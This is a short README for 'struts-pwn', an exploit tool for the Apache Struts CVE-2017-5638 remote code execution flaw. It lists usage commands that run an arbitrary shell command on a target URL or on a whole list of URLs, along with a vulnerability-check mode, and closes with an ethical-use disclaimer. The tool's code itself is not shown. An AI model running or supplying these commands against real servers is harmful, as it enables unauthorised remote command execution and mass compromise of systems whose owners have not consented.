An exploit for Apache Struts CVE-2017-5638
python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id'
python struts-pwn.py --list 'urls.txt' -c 'id'
python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action'
python struts-pwn.py --check --list 'urls.txt'
This project is made for educational and ethical testing purposes only. Usage of struts-pwn for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
The project is licensed under MIT License.
Mazin Ahmed